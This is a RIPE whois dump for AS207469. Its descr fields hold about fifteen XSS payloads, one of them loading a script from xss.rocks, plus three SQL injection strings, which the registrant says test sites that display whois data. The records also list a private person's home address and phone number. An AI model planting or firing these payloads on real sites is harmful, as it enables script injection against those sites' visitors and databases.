as-block: AS207421 - AS208187 descr: RIPE NCC ASN block remarks: These AS Numbers are assigned to network operators in the RIPE NCC service region. mnt-by: RIPE-NCC-HM-MNT created: 2023-07-26T16:18:11Z last-modified: 2023-07-26T16:18:11Z source: RIPE aut-num: AS207469 as-name: SUNGYULI descr: </textarea><script>alert(location.href,"XSS! FUX IT.")</script> descr: <script src=http://xss.rocks/xss.js></script> descr: <img src="javascript:alert('XSS! FUX IT.');"> descr: <img src="o" onerror="alert('XSS! FUX IT.')"></img> descr: ' -- OR 1 = 1 AND 'SQLi' = 'SQLi' descr: " -- OR 1 = 1 AND 'SQLi' = 'SQLi' descr: ` -- OR 1 = 1 AND 'SQLi' = 'SQLi' descr: <svg onload=alert%26%230000000040"XSS! FUX IT")> descr: <svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert("XSS! FUX IT")//'> descr: <IMG SRC=JaVaScRiPt:alert('XSS! FUX IT')> descr: <IMG SRC=`javascript:alert("XSS! FUX IT")`> descr: <IMG """><SCRIPT>alert("XSS! FUX IT")</SCRIPT>"\> descr: <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> descr: <IMG SRC= onmouseover="alert('xxs')"> descr: <img src=x onerror="& # 0000106avascript:alert('XSS')"> descr: <IMG SRC=& # 106;avascript:alert('XSS')> descr: <IMG SRC="jav ascript:alert('XSS! FUX IT');"> descr: .----------------. .----------------. .----------------. descr: | .--------------. | | .--------------. | | .--------------. | descr: | | ____ ____ | | | | _______ | | | | _______ | | descr: | | |_ _||_ _| | | | | / ___ | | | | | / ___ | | | descr: | | \ \ / / | | | | | (__ \_| | | | | | (__ \_| | | descr: | | > `' < | | | | '.___`-. | | | | '.___`-. | | descr: | | _/ /'`\ \_ | | | | |`\____) | | | | | |`\____) | | | descr: | | |____||____| | | | | |_______.' | | | | |_______.' | | descr: | | | | | | | | | | | | descr: | '--------------' | | '--------------' | | '--------------' | descr: '----------------' '----------------' '----------------' descr: descr: |--------------------------------*---------------------------------| descr: | Hello there! | descr: | Maybe you saw these texts in descr. | descr: | These texts are used to test XSS vulnerability in website :) | descr: | If you see the alert which said 'XSS' or something, | descr: | then maybe the website you are looking at is vulnerable, | descr: | please contact the website owner to fix this :). | descr: | (By the way, there has a SQL injection test too.) | descr: | | descr: | Contact me : noc at sciuridae.network | descr: |------------------------------------------------------------------| org: ORG-SYL2-RIPE import: from AS206499 accept ANY export: to AS206499 announce AS207469 import: from AS31142 accept ANY export: to AS31142 announce AS207469 import: from AS6939 accept ANY export: to AS6939 announce AS207469 import: from AS205591 accept ANY export: to AS205591 announce AS207469 admin-c: SYL9-RIPE tech-c: SYL9-RIPE status: ASSIGNED mnt-by: RIPE-NCC-END-MNT mnt-by: SUNGYULI-MNT created: 2020-01-27T13:58:57Z last-modified: 2021-01-05T15:57:06Z source: RIPE sponsoring-org: ORG-HB116-RIPE organisation: ORG-SYL2-RIPE org-name: Sung Yu Li country: TW org-type: OTHER address: No.560 Yongan Road Luye Township, Taitung County 95541, Taiwan phone: +886978079522 e-mail: noc@sciuridae.network abuse-c: ACRO30109-RIPE admin-c: SYL9-RIPE tech-c: SYL9-RIPE mnt-ref: SUNGYULI-MNT mnt-by: SUNGYULI-MNT created: 2020-01-25T03:53:14Z last-modified: 2022-12-01T17:27:20Z source: RIPE person: Sung Yu Li address: No.560 Yongan Road Luye Township, Taitung County 95541, Taiwan phone: +886978079522 nic-hdl: SYL9-RIPE mnt-by: SUNGYULI-MNT created: 2020-01-25T03:25:53Z last-modified: 2020-11-16T17:09:52Z source: RIPE